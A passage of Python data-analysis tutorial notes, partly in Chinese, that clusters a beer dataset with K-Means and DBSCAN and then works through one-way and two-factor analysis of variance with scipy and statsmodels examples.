    8 Miller_Lite 99 10 4.3 0.43 1 1
    11 Coors_Light 102 15 4.1 0.46 1 1
    19 Schlitz_Light 97 7 4.2 0.47 1 1

3 Analyzing the clustering results

    beer.groupby('cluster2').mean()
    calories sodium alcohol cost cluster3
    cluster2
    0 91.833333 10.166667 3.583333 0.433333 0.666667
    1 150.000000 17.000000 4.521429 0.520714 1.000000
    beer.groupby('cluster3').mean()
    calories sodium alcohol cost cluster2
    cluster3
    0 102.75 10.0 4.075000 0.440000 0.0
    1 150.00 17.0 4.521429 0.520714 1.0
    2 70.00 10.5 2.600000 0.420000 0.0

4 Plotting the clustering results

import matplotlib.pyplot as plt
import numpy as np
from pandas.plotting import scatter_matrix

plt.rcParams['font.size'] = 14
plt.rcParams['figure.figsize'] = (10, 6)

centers = beer.groupby('cluster3').mean().reset_index()
colors = np.array(['red', 'green', 'blue', 'yellow'])
markers = np.array(['o', ',', 'v', '^'])
for x, y, cr, mr in zip(beer['calories'], beer['alcohol'],
                        colors[beer['cluster3']], markers[beer['cluster3']]):
    plt.scatter(x, y, c=cr, marker=mr)
plt.scatter(centers.calories, centers.alcohol, linewidths=3, marker='+', s=300, c='black')
plt.xlabel('Calories')
plt.ylabel('Alcohol')
plt.title('Clustering Result with K = 3')

# K = 2
scatter_matrix(beer[['calories', 'sodium', 'alcohol', 'cost']], s=100, alpha=1,
               c=colors[beer["cluster2"]], figsize=(10, 10))
plt.suptitle("With 2 centroids initialized", x=0.5, y=0.92)

# K = 3
scatter_matrix(beer[['calories', 'sodium', 'alcohol', 'cost']], s=100, alpha=1,
               c=colors[beer["cluster3"]], figsize=(10, 10))
plt.suptitle("With 3 centroids initialized", x=0.5, y=0.92)

plt.show()

    png

    png

    png

5 Cluster analysis after standardizing the data

The StandardScaler model in the sklearn library provides a standardization method that transforms the data column by column:

$$z=\frac{x-\mu}{s}$$

where $x$ is the value to be standardized, $\mu$ is the mean of the column, and $s$ is its standard deviation
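As a quick check of the formula (a sketch, not in the original notes), standardizing one column by hand agrees with StandardScaler; note that StandardScaler uses the population standard deviation (ddof = 0).

import numpy as np
from sklearn.preprocessing import StandardScaler

col = np.array([144., 151., 157., 170.])                 # a few calorie values
z_manual = (col - col.mean()) / col.std()                # population std, ddof = 0
z_sklearn = StandardScaler().fit_transform(col.reshape(-1, 1)).ravel()
print(np.allclose(z_manual, z_sklearn))                  # True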

    from sklearn.preprocessing import StandardScaler

    scaler = StandardScaler()
    X_scaled = scaler.fit_transform(X)
    X_scaled
array([[ 0.38791334,  0.00779468,  0.43380786, -0.45682969],
       [ 0.6250656 ,  0.63136906,  0.62241997, -0.45682969],
       [ 0.82833896,  0.00779468, -3.14982226, -0.10269815],
       [ 1.26876459, -1.23935408,  0.90533814,  1.66795955],
       [ 0.65894449, -0.6157797 ,  0.71672602,  1.95126478],
       [ 0.42179223,  1.25494344,  0.3395018 , -1.5192243 ],
       [ 1.43815906,  1.41083704,  1.1882563 , -0.66930861],
       [ 0.55730781,  1.87851782,  0.43380786, -0.52765599],
       [-1.1366369 , -0.7716733 ,  0.05658363, -0.45682969],
       [-0.66233238, -1.08346049, -0.5092527 , -0.66930861],
       [ 0.25239776,  0.47547547,  0.3395018 , -0.38600338],
       [-1.03500022,  0.00779468, -0.13202848, -0.24435076],
       [ 0.08300329, -0.6157797 , -0.03772242,  0.03895447],
       [ 0.59118671,  0.63136906,  0.43380786,  1.88043848],
       [ 0.55730781, -1.39524768,  0.71672602,  2.0929174 ],
       [-2.18688263,  0.00779468, -1.82953748, -0.81096123],
       [ 0.21851887,  0.63136906,  0.15088969, -0.45682969],
       [ 0.38791334,  1.41083704,  0.62241997, -0.45682969],
       [-2.05136705, -1.39524768, -1.26370115, -0.24435076],
       [-1.20439469, -1.23935408, -0.03772242, -0.17352445]])

Most of the values fall between -2 and 2, so the columns now span roughly the same range

# Re-run K-Means clustering on the standardized data
    km = KMeans(n_clusters=3).fit(X_scaled)
    beer["scaled_cluster"] = km.labels_
    beer.sort_values('scaled_cluster')
    name calories sodium alcohol cost cluster2 cluster3 scaled_cluster
    9 Budweiser_Light 113 8 3.7 0.40 0 0 0
    15 Pabst_Extra_Light 68 15 2.3 0.38 0 2 0
    12 Michelob_Light 135 11 4.2 0.50 1 1 0
    11 Coors_Light 102 15 4.1 0.46 0 0 0
    18 Olympia_Goled_Light 72 6 2.9 0.46 0 2 0
    8 Miller_Lite 99 10 4.3 0.43 0 0 0
    19 Schlitz_Light 97 7 4.2 0.47 0 0 0
    2 Lowenbrau 157 15 0.9 0.48 1 1 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 1 1 1
    5 Old_Milwaukee 145 23 4.6 0.28 1 1 1
    10 Coors 140 18 4.6 0.44 1 1 1
    1 Schlitz 151 19 4.9 0.43 1 1 1
    16 Hamms 139 19 4.4 0.43 1 1 1
    17 Heilemans_Old_Style 144 24 4.9 0.43 1 1 1
    6 Augsberger 175 24 5.5 0.40 1 1 1
    0 Budweiser 144 15 4.7 0.43 1 1 1
    4 Heineken 152 11 5.0 0.77 1 1 2
    3 Kronenbourg 170 7 5.2 0.73 1 1 2
    13 Becks 150 19 4.7 0.76 1 1 2
    14 Kirin 149 6 5.0 0.79 1 1 2
# Inspect the character of each cluster through its per-column means
    beer.groupby('scaled_cluster').mean()
    calories sodium alcohol cost cluster2 cluster3
    scaled_cluster
    0 105.375 10.875 3.3250 0.4475 0.25 0.75
    1 148.375 21.125 4.7875 0.4075 1.00 1.00
    2 155.250 10.750 4.9750 0.7625 1.00 1.00
    scatter_matrix(X, c=colors[beer.scaled_cluster], alpha=1, figsize=(10, 10), s=100)
    array([[<AxesSubplot:xlabel='calories', ylabel='calories'>,        <AxesSubplot:xlabel='sodium', ylabel='calories'>,        <AxesSubplot:xlabel='alcohol', ylabel='calories'>,        <AxesSubplot:xlabel='cost', ylabel='calories'>],       [<AxesSubplot:xlabel='calories', ylabel='sodium'>,        <AxesSubplot:xlabel='sodium', ylabel='sodium'>,        <AxesSubplot:xlabel='alcohol', ylabel='sodium'>,        <AxesSubplot:xlabel='cost', ylabel='sodium'>],       [<AxesSubplot:xlabel='calories', ylabel='alcohol'>,        <AxesSubplot:xlabel='sodium', ylabel='alcohol'>,        <AxesSubplot:xlabel='alcohol', ylabel='alcohol'>,        <AxesSubplot:xlabel='cost', ylabel='alcohol'>],       [<AxesSubplot:xlabel='calories', ylabel='cost'>,        <AxesSubplot:xlabel='sodium', ylabel='cost'>,        <AxesSubplot:xlabel='alcohol', ylabel='cost'>,        <AxesSubplot:xlabel='cost', ylabel='cost'>]], dtype=object)

    png

Conclusion: standardizing the data does not necessarily make the clustering more effective

6 Evaluating the clustering results

# Compute the silhouette scores
    from sklearn import metrics
    score_scaled = metrics.silhouette_score(X, beer.scaled_cluster)
    score = metrics.silhouette_score(X, beer.cluster3)
    score_scaled, score
    (0.1797806808940007, 0.6731775046455796)

The unstandardized data actually achieves the larger silhouette score, i.e. the cleaner clustering

This suggests that in clustering this data set some columns deserve a higher weight, which may be a property the data itself demands
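One way to act on that observation (an illustrative sketch with hypothetical weights, not part of the original notes) is to standardize first and then multiply each column by a weight of one's choosing before clustering, so the weighted columns dominate the distance computation.

import numpy as np

weights = np.array([2.0, 0.5, 2.0, 1.0])   # hypothetical weights for calories, sodium, alcohol, cost
X_weighted = X_scaled * weights            # X_scaled was computed above
km_w = KMeans(n_clusters=3).fit(X_weighted)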

7 Choosing the K-Means parameter K with the silhouette score

# Vary K from 2 to 19, cluster the same data with K-Means each time, and compute the silhouette score
scores = []
for k in range(2, 20):
    labels = KMeans(n_clusters=k).fit(X).labels_
    score = metrics.silhouette_score(X, labels)
    scores.append(score)
scores
    [0.6917656034079486, 0.6731775046455796, 0.5857040721127795, 0.422548733517202, 0.4559182167013377, 0.43776116697963124, 0.38946337473125997, 0.39746405172426014, 0.3915697409245163, 0.3413109618039333, 0.3459775237127248, 0.31221439248428434, 0.30707782144770296, 0.31834561839139497, 0.2849514001174898, 0.23498077333071996, 0.1588091017496281, 0.08423051380151177]

As K increases, the silhouette score keeps shrinking and the clustering quality deteriorates

plt.plot(list(range(2, 20)), scores)
plt.xlabel('Number of Clusters Initialized')
plt.ylabel('Silhouette Score')
Text(0, 0.5, 'Silhouette Score')

    png

8 DBSCAN clustering

    from sklearn.cluster import DBSCAN

    db = DBSCAN(eps=10, min_samples=2).fit(X)
    labels = db.labels_
    beer['cluster_db'] = labels
    beer.sort_values('cluster_db')
    name calories sodium alcohol cost cluster2 cluster3 cluster_db
    9 Budweiser_Light 113 8 3.7 0.40 1 1 -1
    3 Kronenbourg 170 7 5.2 0.73 0 0 -1
    6 Augsberger 175 24 5.5 0.40 0 0 -1
    17 Heilemans_Old_Style 144 24 4.9 0.43 0 0 0
    16 Hamms 139 19 4.4 0.43 0 0 0
    14 Kirin 149 6 5.0 0.79 0 0 0
    13 Becks 150 19 4.7 0.76 0 0 0
    12 Michelob_Light 135 11 4.2 0.50 0 0 0
    10 Coors 140 18 4.6 0.44 0 0 0
    0 Budweiser 144 15 4.7 0.43 0 0 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 0 0 0
    5 Old_Milwaukee 145 23 4.6 0.28 0 0 0
    4 Heineken 152 11 5.0 0.77 0 0 0
    2 Lowenbrau 157 15 0.9 0.48 0 0 0
    1 Schlitz 151 19 4.9 0.43 0 0 0
    8 Miller_Lite 99 10 4.3 0.43 1 1 1
    11 Coors_Light 102 15 4.1 0.46 1 1 1
    19 Schlitz_Light 97 7 4.2 0.47 1 1 1
    15 Pabst_Extra_Light 68 15 2.3 0.38 1 2 2
    18 Olympia_Goled_Light 72 6 2.9 0.46 1 2 2

Label -1 marks noise points and the other labels mark clustered points; the result agrees broadly with the K-Means clustering
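To summarize the cluster sizes and the number of noise points, a one-line sketch with collections.Counter:

from collections import Counter

print(Counter(labels))   # Counter({0: 12, -1: 3, 1: 3, 2: 2}); the entry under -1 counts the noise points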

    beer.groupby('cluster_db').mean()
    calories sodium alcohol cost cluster2 cluster3
    cluster_db
    -1 152.666667 13.000000 4.800000 0.510000 0.333333 0.333333
    0 146.250000 17.250000 4.383333 0.513333 0.000000 0.000000
    1 99.333333 10.666667 4.200000 0.453333 1.000000 1.000000
    2 70.000000 10.500000 2.600000 0.420000 1.000000 2.000000
    scatter_matrix(X, c=colors[beer.cluster_db], alpha=1, figsize=(10, 10), s=100)
    array([[<AxesSubplot:xlabel='calories', ylabel='calories'>,        <AxesSubplot:xlabel='sodium', ylabel='calories'>,        <AxesSubplot:xlabel='alcohol', ylabel='calories'>,        <AxesSubplot:xlabel='cost', ylabel='calories'>],       [<AxesSubplot:xlabel='calories', ylabel='sodium'>,        <AxesSubplot:xlabel='sodium', ylabel='sodium'>,        <AxesSubplot:xlabel='alcohol', ylabel='sodium'>,        <AxesSubplot:xlabel='cost', ylabel='sodium'>],       [<AxesSubplot:xlabel='calories', ylabel='alcohol'>,        <AxesSubplot:xlabel='sodium', ylabel='alcohol'>,        <AxesSubplot:xlabel='alcohol', ylabel='alcohol'>,        <AxesSubplot:xlabel='cost', ylabel='alcohol'>],       [<AxesSubplot:xlabel='calories', ylabel='cost'>,        <AxesSubplot:xlabel='sodium', ylabel='cost'>,        <AxesSubplot:xlabel='alcohol', ylabel='cost'>,        <AxesSubplot:xlabel='cost', ylabel='cost'>]], dtype=object)

    png

15 Analysis of Variance

15.1 Overview of analysis of variance

By analyzing experimental data, we test whether several normal populations with the same variance also have equal means

Example: to evaluate the service quality of several industries, a consumer association sampled different firms from 4 industries. The numbers of consumer complaints against the 23 sampled firms over the most recent year are shown in the table below

import numpy as np
import pandas as pd

data = np.array([[57, 68, 31, 44],
                 [66, 39, 49, 51],
                 [49, 29, 21, 65],
                 [40, 45, 34, 77],
                 [34, 56, 40, 58],
                 [53, 51, None, None],
                 [44, None, None, None]])
df = pd.DataFrame(data, index=range(1, 8), columns=["零售业", "旅游业", "航空业", "家电制造业"])
df.index.name = "观测值"
df
    零售业 旅游业 航空业 家电制造业
    观测值
    1 57 68 31 44
    2 66 39 49 51
    3 49 29 21 65
    4 40 45 34 77
    5 34 56 40 58
    6 53 51 None None
    7 44 None None None
import matplotlib.pyplot as plt

# Make Chinese characters display correctly
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False

plt.figure()
for i in range(data.shape[1]):
    plt.scatter(i * np.ones(data.shape[0]), data.T[i])
plt.xticks(range(data.shape[1]), ('零售业', '旅游业', '航空业', '家电制造业'))
plt.ylabel('被投诉次数') # set the axis labels
plt.xlabel('行业')
plt.show()

    png

The scatter plot suggests that the mean number of complaints differs across industries, but the difference could also stem from sampling randomness; a more precise method is needed to test whether it is significant

15.2 Comparing the variances

• Within-group variance: the variance of the sample data at a single level of a factor (a single population), e.g. the variance of the complaint counts in retail. The within-group variance contains only random error

• Between-group variance: the variance between the samples at different levels of a factor (different populations), e.g. the variance between the complaint counts of the 4 industries. The between-group variance contains both random error and systematic error

If the industry has no effect on the number of complaints, the between-group error contains only random error and no systematic error; after averaging, the between-group and within-group errors are close to each other and their ratio is close to 1

If the industry does affect the number of complaints, the between-group error contains systematic error on top of random error, and the ratio exceeds 1

15.3 Analysis of variance

15.3.1 One-way analysis of variance

Statistics involved in the analysis of variance:

1 Mean of each level (population)

$$\bar X_i=\frac{1}{n_i}\Sigma^{n_i}_{j=1}X_{ij},\quad i=1,\dots,k$$

X_bar = []
for i in range(data.shape[1]):
    X_bar.append(data.T[i][data.T[i] != np.array(None)].mean())
X_bar
    [49.0, 48.0, 35.0, 59.0]
2 Grand mean of all observations

The sum of all observations $X_{ij}$ divided by the number of observations

$$\bar{\bar{X}}=\frac{1}{n}\Sigma^k_{i=1}\Sigma^{n_i}_{j=1}X_{ij}=\frac{1}{n}\Sigma^k_{i=1}n_i\bar{X_i}$$

X_bar_bar = data.T[data.T != np.array(None)].mean()  # the grand mean ("X double bar")
    X_bar_bar
    47.869565217391305
3 Total sum of squares (SST)

The sum of squared deviations of all observations $X_{ij}$ from the grand mean $\bar{\bar X}$; it reflects the dispersion of the full data set.

$$SST=\Sigma^k_{i=1}\Sigma^{n_i}_{j=1}(X_{ij}-\bar{\bar X})^2$$

    SST = ((data.T[data.T != np.array(None)] - X_bar_bar) ** 2).sum()
    SST
    4164.608695652174
4 Between-level (treatment) sum of squares (SSA)

The sum of squared deviations of each level mean $\bar X_i$ from the grand mean $\bar{\bar X}$; to a large extent it reflects the variation caused by differences between the population means $\mu_i$, and it is also called the between-group sum of squares. It contains systematic error as well as random error

$$SSA=\Sigma^k_{i=1}\Sigma^{n_i}_{j=1}(\bar X_i-\bar{\bar X})^2=\Sigma^k_{i=1}n_i(\bar X_i-\bar{\bar X})^2$$

SSA = 0
for i in range(data.shape[1]):
    SSA += len(data.T[i][data.T[i] != np.array(None)]) * \
        (data.T[i][data.T[i] != np.array(None)].mean() - X_bar_bar) ** 2
SSA
    1456.608695652174
5 Error sum of squares (SSE)

Within each population $A_i$, the sum of squared deviations of the sample data $X_{ij}$ from their own level mean $\bar X_i$; it reflects variation of $X_{ij}$ caused by sampling randomness, is also called the within-group sum of squares, and measures random error only

$$SSE=\Sigma^k_{i=1}\Sigma^{n_i}_{j=1}(X_{ij}-\bar{X_i})^2$$

SSE = 0
for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
        SSE += (j - X_bar[i]) ** 2
SSE
    2708.0
6 Decomposition of the total sum of squares

    $$SST=SSE+SSA$$
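A quick numerical check of this decomposition with the values just computed (a one-line sketch):

print(np.isclose(SST, SSE + SSA))   # True: 2708.0 + 1456.61 adds back up to 4164.61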

7 Degrees of freedom

$SST$ has $n-1$ degrees of freedom, where $n$ is the total number of observations

The between-group sum of squares ($SSA$) has $k-1$ degrees of freedom, where $k$ is the number of factor levels (populations)

The error sum of squares ($SSE$) has $n-k$ degrees of freedom

8 The mean squares MSA and MSE

The mean square of the between-group sum of squares $SSA$ is denoted $MSA$

The mean square of the within-group sum of squares $SSE$ is denoted $MSE$

Each is computed by dividing the sum of squares by its corresponding degrees of freedom

The test statistic is set up as

$$F=\frac{SSA/(k-1)}{SSE/(n-k)}=\frac{MSA}{MSE}\sim F(k-1, n-k)$$

    k = len(data[1])
    n = len(data[data!= np.array(None)])
    F = (SSA / (k - 1)) / (SSE / (n - k))
    F
    3.4066426904716036

The results above can be arranged as the one-way ANOVA table:

Source    Sum of squares    df     Mean square    F value
Between   SSA               k-1    MSA            MSA/MSE
Within    SSE               n-k    MSE
Total     SST=SSE+SSA       n-1
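To judge the computed F ≈ 3.41 against the F(k-1, n-k) = F(3, 19) reference distribution, the critical value and p-value can be obtained from scipy.stats (a sketch; scipy is not imported in the original notes at this point):

from scipy.stats import f

print(f.ppf(0.95, k - 1, n - k))   # critical value at alpha = 0.05, about 3.13
print(f.sf(F, k - 1, n - k))       # p-value, just under 0.05, so the industry effect is significant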

15.3.2 Multiple comparisons in the analysis of variance

To learn in more detail how the individual populations of factor A affect the observed variable,

a multiple comparison test compares the population means pairwise, to determine exactly which means differ and to find the best level.

If the null hypothesis $H_0:\mu_i=\mu_j,\ i,j=1,2,\dots,r,\ i\ne j$ holds, the test statistic should be small, so the rejection region is $|\bar X_i-\bar X_j|>t_{\alpha/2}\sqrt{MSE(\frac{1}{n_i}+\frac{1}{n_j})}$

If the rejection condition is met, $\mu_i$ and $\mu_j$ are considered significantly different; otherwise they are not

Example 15.2
import pandas as pd
import numpy as np

data = np.array([[26.5, 31.2, 27.9, 30.8],
                 [28.7, 28.3, 25.1, 29.6],
                 [25.1, 30.8, 28.5, 32.4],
                 [29.1, 27.9, 24.2, 31.7],
                 [27.2, 29.6, 26.5, 32.8]])
df = pd.DataFrame(data, index=range(1, 6), columns=["无色", "粉色", "橘黄色", "绿色"])
df.index.name = "样本"
df
    df
    无色 粉色 橘黄色 绿色
    样本
    1 26.5 31.2 27.9 30.8
    2 28.7 28.3 25.1 29.6
    3 25.1 30.8 28.5 32.4
    4 29.1 27.9 24.2 31.7
    5 27.2 29.6 26.5 32.8
X_bar = []
for i in data.T:
    X_bar.append(np.round(i.mean(), 2))
X_bar
    [27.32, 29.56, 26.44, 31.46]
SSE = 0
for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
        SSE += (j - X_bar[i]) ** 2
SSE
    39.083999999999975
    n = data.size
    k = data.shape[1]
    MSE = SSE / (n - k)
    MSE
    2.4427499999999984

Let the significance level $\alpha=0.05$; then $t_{\alpha/2}(16)=2.12$ and $n_i=n_j=5$ for $i,j=1,2,3,4$

$t_{\alpha/2}\sqrt{MSE(\frac{1}{n_i}+\frac{1}{n_j})}=2.095$

    from scipy.stats import t

    alpha = 0.05
    t_alpha_div_2 = t.ppf(1 - alpha / 2, (n - k))
    t_alpha_div_2
    2.1199052992210112
    np.round(t_alpha_div_2 * np.sqrt(MSE * (1 / data.shape[0] + 1 / data.shape[0])), 3)
    2.095
for i in range(len(X_bar) - 1):
    for j in range(i + 1, len(X_bar)):
        print("|\\bar X_{} - \\bar X_{}| = {}".format(i + 1, j + 1, np.round(np.abs(X_bar[i] - X_bar[j]), 2)))
|\bar X_1 - \bar X_2| = 2.24
|\bar X_1 - \bar X_3| = 0.88
|\bar X_1 - \bar X_4| = 4.14
|\bar X_2 - \bar X_3| = 3.12
|\bar X_2 - \bar X_4| = 1.9
|\bar X_3 - \bar X_4| = 5.02

From these results the corresponding effects can be read off:

e.g. $|\bar X_1 - \bar X_2|>2.095$, so $X_1$ and $X_2$ differ significantly; that is, colorless and pink packaging have significantly different effects on sales

$|\bar X_2 - \bar X_4|<2.095$, so $X_2$ and $X_4$ do not differ significantly; that is, pink and green packaging do not differ significantly in their effect on sales
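The pairwise checks can also be automated with the quantities already computed (a small sketch; threshold is the 2.095 bound derived above):

threshold = t_alpha_div_2 * np.sqrt(MSE * (1 / 5 + 1 / 5))   # n_i = n_j = 5
for i in range(len(X_bar) - 1):
    for j in range(i + 1, len(X_bar)):
        diff = abs(X_bar[i] - X_bar[j])
        verdict = 'significant' if diff > threshold else 'not significant'
        print('group {} vs group {}: |diff| = {:.2f} -> {}'.format(i + 1, j + 1, diff, verdict))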

15.3.3 Multi-factor analysis of variance

• Two-factor decomposition of the sum of squares without interaction: $SST=SSA+SSB+SSE$

• Two-factor decomposition of the sum of squares with interaction: $SST=SSA+SSB+SSAB+SSE$

Source            Sum of squares   df             Mean square                      F value
Factor A          $SSA$            $s-1$          $MSA=\frac{SSA}{s-1}$            $F_A=\frac{MSA}{MSE}$
Factor B          $SSB$            $r-1$          $MSB=\frac{SSB}{r-1}$            $F_B=\frac{MSB}{MSE}$
Interaction AB    $SSAB$           $(r-1)(s-1)$   $MSAB=\frac{SSAB}{(r-1)(s-1)}$   $F_{AB}=\frac{MSAB}{MSE}$
Error             $SSE$            $rs(m-1)$      $MSE=\frac{SSE}{rs(m-1)}$
Total             $SST$            $rsm-1$

Statistic                    Distribution
$F_A=\frac{MSA}{MSE}$        $F\left[s-1,rs(m-1)\right]$
$F_B=\frac{MSB}{MSE}$        $F\left[r-1,rs(m-1)\right]$
$F_{AB}=\frac{MSAB}{MSE}$    $F\left[(r-1)(s-1),rs(m-1)\right]$

$m$ is the number of trials per factor combination ($\ge2$ when the interaction term is estimated)

Example 15.3

There are $s=4$ brands of color TV sold in $r=5$ regions. To analyze whether brand and region affect sales, the sales of every brand in every region are recorded below. Do brand and region have a significant effect on sales? $(\alpha=0.05)$

import numpy as np
import pandas as pd

data = np.array([[365, 350, 343, 340, 323],
                 [345, 368, 363, 330, 333],
                 [358, 323, 353, 343, 308],
                 [288, 280, 298, 260, 298]])
df = pd.DataFrame(data, columns=["B1", "B2", "B3", "B4", "B5"],
                  index=["A1", "A2", "A3", "A4"])
df.index.name = "品牌销售表(因素 A)"
df.columns.name = "销售地区(因素 B)"
df
    销售地区(因素 B) B1 B2 B3 B4 B5
    品牌销售表(因素 A)
    A1 365 350 343 340 323
    A2 345 368 363 330 333
    A3 358 323 353 343 308
    A4 288 280 298 260 298

$SST=365^2+350^2+\dots+298^2-\frac{6569^2}{20}=17888.95$

    SST = (data ** 2).sum() - data.sum() ** 2 / data.size
    SST
    17888.950000000186

$SSA=\frac{1}{5}(1721^2+1739^2+\dots+1424^2)-\frac{6569^2}{20}=13004.55$

SSA = 0
for i in data:
    SSA += i.sum() ** 2
SSA /= data.shape[1]
SSA -= data.sum() ** 2 / data.size
SSA
    13004.55000000028

$SSB=\frac{1}{4}(1356^2+1321^2+\dots+1262^2)-\frac{6569^2}{20}=2011.7$

SSB = 0
for i in data.T:
    SSB += i.sum() ** 2
SSB /= data.shape[0]
SSB -= data.sum() ** 2 / data.size
SSB
    2011.7000000001863

    $SSE=SST-SSA-SSB=2872.7$

    SSE = SST - SSA - SSB
    SSE
    2872.6999999997206
Source              Sum of squares                      df                    Mean square                             F value
Brand (factor A)    SSA = 13004.55                      s - 1 = 3             MSA = SSA / (s - 1) = 4334.85           MSA / MSE = 18.10777
Region (factor B)   SSB = 2011.7                        r - 1 = 4             MSB = SSB / (r - 1) = 502.925           MSB / MSE = 2.100846
Error               SSE = 2872.7                        (r - 1)(s - 1) = 12   MSE = SSE / ((r - 1)(s - 1)) = 239.3917
Total               SST = SSA + SSB + SSE = 17888.95    rsm - 1 = 19
• Since $F_A=18.108>F_{0.95}(3, 12)=3.49$, the TV brand has a significant effect on sales

• Since $F_B=2.101<F_{0.95}(4, 12)=3.26$, the sales region has no significant effect on sales
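The two critical values quoted above can be reproduced with scipy.stats, and the F statistics recomputed from the sums of squares (a sketch; scipy is not imported in the original code for this example):

from scipy.stats import f

s, r = 4, 5                                     # brands, regions
MSE = SSE / ((r - 1) * (s - 1))                 # 239.39...
print((SSA / (s - 1)) / MSE)                    # F_A = 18.10...
print((SSB / (r - 1)) / MSE)                    # F_B = 2.10...
print(f.ppf(0.95, s - 1, (r - 1) * (s - 1)))    # about 3.49
print(f.ppf(0.95, r - 1, (r - 1) * (s - 1)))    # about 3.26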

15.4 A comprehensive example: rating analysis for a restaurant chain

15.4.1 A one-way ANOVA example

A restaurant chain has user rating data from 3 cities, shown below. The ratings in each city are known to be approximately normal with equal variances. At 95% confidence, does the city have a significant effect on the user ratings?

    from scipy.stats import f_oneway
    import scipy.stats as stats
    import numpy as np
    import pandas as pd
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm

    cityA = [10,9,9,8,8,7,7,8,8,9]
    cityB = [10,8,9,8,7,7,7,8,9,9]
    cityC = [9,9,8,8,8,7,6,9,8,9]
    df = pd.DataFrame(np.vstack((cityA, cityB, cityC)), index=['A', 'B', 'C'])
    df.columns.name = "用户评分"
    df.index.name = "城市"
    df
    用户评分 0 1 2 3 4 5 6 7 8 9
    城市
    A 10 9 9 8 8 7 7 8 8 9
    B 10 8 9 8 7 7 7 8 9 9
    C 9 9 8 8 8 7 6 9 8 9
Method 1: using scipy.stats.f_oneway()
# Before calling f_oneway, check the homogeneity-of-variance assumption; here Levene's test is used
"""
scipy.stats.levene(*samples, center='median', proportiontocut=0.05)
Performs the Levene test for equal variances.
A small p-value suggests that the populations do not have equal variances.
"""
(W, p) = stats.levene(cityA, cityB, cityC)
if p < 0.05:
    print(('Warning: the p-value of the Levene test is <0.05: p = {0}'.format(p)))
# One-way analysis of variance
# Method 1
F_statistic, pVal = stats.f_oneway(cityA, cityB, cityC)
print('One-way ANOVA result (f_oneway): F = {0}, and p = {1}'.format(F_statistic, pVal))
if pVal < 0.05:
    print('One of the groups is significantly different.')
One-way ANOVA result (f_oneway): F = 0.10150375939849626, and p = 0.9038208903685354
Method 2: using the anova_lm model from the statsmodels library, running the analysis of variance through a linear OLS model
# One-way analysis of variance
# Method 2: statsmodels library functions
# Put the data into a DataFrame
df = pd.DataFrame()
names = locals()
for city in ['A', 'B', 'C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city': city[-1], 'S': s})
    df = pd.concat([df, df_temp], ignore_index=True)
# Run the analysis of variance with a linear OLS model
model = ols('S ~ city', df).fit()
anovaResults = anova_lm(model)
print('One-way ANOVA result (anova_lm):')
print(anovaResults)
df
One-way ANOVA result (anova_lm):
            df  sum_sq   mean_sq         F    PR(>F)
city       2.0     0.2  0.100000  0.101504  0.903821
Residual  27.0    26.6  0.985185       NaN       NaN
    city S
    0 A 10
    1 A 9
    2 A 9
    3 A 8
    4 A 8
    5 A 7
    6 A 7
    7 A 8
    8 A 8
    9 A 9
    10 B 10
    11 B 8
    12 B 9
    13 B 8
    14 B 7
    15 B 7
    16 B 7
    17 B 8
    18 B 9
    19 B 9
    20 C 9
    21 C 9
    22 C 8
    23 C 8
    24 C 8
    25 C 7
    26 C 6
    27 C 9
    28 C 8
    29 C 9
Method 3: computing each error term by hand to carry out the one-way ANOVA
from scipy.stats import f_oneway
import scipy.stats as stats
import numpy as np
import pandas as pd

cityA = [10, 9, 9, 8, 8, 7, 7, 8, 8, 9]
cityB = [10, 8, 9, 8, 7, 7, 7, 8, 9, 9]
cityC = [9, 9, 8, 8, 8, 7, 6, 9, 8, 9]
df = pd.DataFrame()
names = locals()
for city in ['A', 'B', 'C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city': city[-1], 'S': s})
    df = pd.concat([df, df_temp], ignore_index=True)
groups = df.groupby('city')
# The "total sum-square" is the squared deviation from the mean
ss_total = np.sum((df['S'] - df['S'].mean()) ** 2)
# Compute SSE and SSA
(ss_treatments, ss_error) = (0, 0)
for val, group in groups:
    ss_error += sum((group['S'] - group['S'].mean()) ** 2)
    ss_treatments += len(group) * (group['S'].mean() - df['S'].mean()) ** 2
df_groups = len(groups) - 1
df_residuals = len(df) - len(groups)
F = (ss_treatments / df_groups) / (ss_error / df_residuals)
fdist = stats.f(df_groups, df_residuals)   # F distribution with (2, 27) degrees of freedom
p = fdist.sf(F)
print(('One-way ANOVA result (manual): F = {0}, and p = {1}'.format(F, p)))
One-way ANOVA result (manual): F = 0.1015037593984973, and p = 0.9038208903685354

Since $F<F_{0.05}(2, 27)=3.35$ and $P>0.05$, the null hypothesis stands: we cannot conclude that the city affects the user ratings
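The critical value quoted here can likewise be checked with scipy.stats (a sketch):

from scipy.stats import f

print(f.ppf(0.95, 2, 27))   # about 3.35, far above the computed F of 0.10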

15.4.2 A multi-factor ANOVA example

User rating data for the restaurant chain were collected under two factors: environment grade (environment) and ingredient grade (ingredients)

# The 2 factors affecting the restaurant: environment grade and ingredient grade
from scipy import stats
import pandas as pd
import numpy as np
from statsmodels.formula.api import ols
from statsmodels.stats.anova import anova_lm
environmental = [5,5,5,5,5,4,4,4,4,4,3,3,3,3,3,2,2,2,2,2,1,1,1,1,1]
ingredients = [5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1]
score = [5,5,4,3,2,5,4,4,3,2,4,4,3,3,2,4,3,2,2,2,3,3,3,2,1]
data = {'E': environmental, 'I': ingredients, 'S': score}  # E: environment, I: ingredients, S: score
df = pd.DataFrame(data)
df
    E I S
    0 5 5 5
    1 5 4 5
    2 5 3 4
    3 5 2 3
    4 5 1 2
    5 4 5 5
    6 4 4 4
    7 4 3 4
    8 4 2 3
    9 4 1 2
    10 3 5 4
    11 3 4 4
    12 3 3 3
    13 3 2 3
    14 3 1 2
    15 2 5 4
    16 2 4 3
    17 2 3 2
    18 2 2 2
    19 2 1 2
    20 1 5 3
    21 1 4 3
    22 1 3 3
    23 1 2 2
    24 1 1 1

Use the anova_lm module from statsmodels to run the multi-factor analysis of variance

    """
    符号意义:
    (~)隔离自变量和因变量(左边因变量, 右边自变量)
    (+)分离各个自变量
    """
    formula = 'S~E+I'
    results = anova_lm(ols(formula,df).fit() )
    print(results)
